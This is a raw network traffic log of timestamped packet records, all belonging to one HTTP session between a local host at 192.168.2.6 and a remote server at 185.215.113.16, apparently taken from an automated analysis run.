Jul 26, 2024 12:57:05.642651081 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642668962 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642678022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.642698050 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.642709017 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.642739058 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.643191099 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.643201113 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.643218994 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.643228054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.643243074 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.643244028 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.643256903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.643271923 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.643289089 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.643301964 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.643323898 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.644028902 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.644037962 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.644053936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.644063950 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.644079924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.644084930 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.644089937 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.644105911 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.644113064 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.644113064 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.644140005 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.644140005 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.645323992 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.645334005 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.645351887 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.645360947 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.645374060 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.645376921 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.645385981 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.645392895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.645402908 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.645417929 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.645422935 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.645457983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.645457983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.685097933 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685132980 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685154915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685211897 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.685250998 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.685389996 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685401917 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685420036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685431004 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685453892 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.685468912 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.685844898 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685854912 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685873985 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685883999 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685899019 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.685899019 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685906887 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.685919046 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685930014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.685942888 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.685976982 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.686604977 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.686651945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.686810970 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.686822891 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.686851978 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.686866999 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.687021971 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.687031984 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.687051058 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.687062025 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.687064886 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.687092066 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.687114000 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.687537909 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.687547922 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.687566996 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.687577009 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.687582970 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.687583923 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.687593937 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.687602997 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.687616110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.687638998 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.688189983 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.688240051 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.688390970 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.688400984 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.688420057 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.688431978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.688441992 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.688446045 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.688458920 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.688469887 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.688477993 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.688499928 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.688520908 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.689378977 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.689388990 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.689408064 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.689418077 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.689434052 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.689441919 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.689441919 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.689444065 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.689461946 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.689471960 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.689486980 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.689544916 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.689544916 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.690318108 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.690327883 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.690347910 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.690359116 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.690361977 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.690367937 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.690380096 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.690392017 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.690403938 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.690408945 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.690413952 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.690413952 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.690418959 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.690454960 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.690510988 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.690510988 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.691215992 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.691227913 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.691247940 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.691257000 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.691268921 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.691268921 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.691277027 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.691291094 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.691315889 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.691802979 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.691812992 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.691832066 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.691842079 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.691848040 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.691850901 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.691868067 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.691886902 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.692310095 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.692320108 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.692338943 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.692348003 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.692361116 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.692367077 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.692370892 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.692377090 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.692393064 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.692410946 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.704514027 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.704576969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.704586029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.704598904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.704624891 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.704637051 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.704799891 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.704809904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.704827070 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.704834938 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.704844952 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.704863071 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.704883099 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.732815981 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.732829094 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.732835054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.732839108 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.732984066 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.733089924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.733208895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.733210087 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.733253956 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.733273983 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.733326912 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.733365059 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.733411074 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.733505011 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.733514071 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.733531952 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.733550072 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.733572006 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.733875990 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.733884096 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.733925104 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.734070063 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.734113932 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.734508038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.734555960 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.734580994 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.734590054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.734618902 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.734632969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.735084057 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735091925 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735106945 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735116005 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735126972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.735138893 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.735168934 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.735301018 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735353947 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.735480070 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735487938 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735502958 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735511065 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735516071 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735519886 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.735522032 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.735554934 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.735613108 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.736285925 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.736294031 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.736299038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.736315012 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.736323118 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.736337900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.736346006 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.736346960 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.736346960 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.736368895 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.736385107 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.778453112 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.778467894 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.778487921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.778523922 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.778561115 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.778697014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.778714895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.778728962 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.778740883 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.778757095 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.778791904 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.779051065 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.779149055 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.779159069 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.779176950 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.779187918 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.779223919 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.779232979 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.779237032 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.779289007 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.779289007 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.779314041 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.780131102 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.780139923 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.780143976 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.780148983 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.780153990 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.780158997 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.780163050 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.780169010 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.780227900 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.780975103 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.780985117 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781001091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781011105 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781023026 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781037092 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781047106 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.781054020 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781068087 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.781068087 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.781094074 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.781917095 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781928062 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781944036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781954050 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781968117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.781975031 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.781985044 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.781990051 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782018900 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.782061100 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782064915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782124043 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.782871008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782881021 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782893896 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782907009 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782917976 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782923937 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.782934904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782943964 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.782954931 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782968998 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.782972097 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.782994986 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.783008099 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.783844948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.783855915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.783874035 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.783883095 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.783895969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.783900023 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.783910990 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.783922911 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.783929110 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.783936024 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.783938885 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.783962011 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.783991098 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.784723997 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.784734011 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.784745932 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.784759998 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.784770966 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.784775972 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.784781933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.784786940 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.784802914 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.784816980 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.784818888 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.784831047 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.784862995 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.785644054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.785654068 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.785667896 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.785677910 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.785693884 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.785696030 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.785702944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.785713911 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.785721064 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.785725117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.785749912 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.785763025 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.796462059 CEST	80	60778	185.215.113.16	192.168.2.6
